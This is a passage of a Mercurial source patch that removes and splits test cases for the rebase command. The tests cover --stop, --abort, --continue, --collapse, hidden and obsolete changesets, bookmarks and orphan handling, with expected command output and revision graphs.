A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. 
- - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. 
- $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while 
merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [20] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d 
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [20] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. 
- $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete4.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete4.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete4.t @@ -18,1639 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 
drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 
'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex 
case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 
08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . 
- rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. 
- -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. 
- - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 
'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. 
- -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [10] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden 
changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 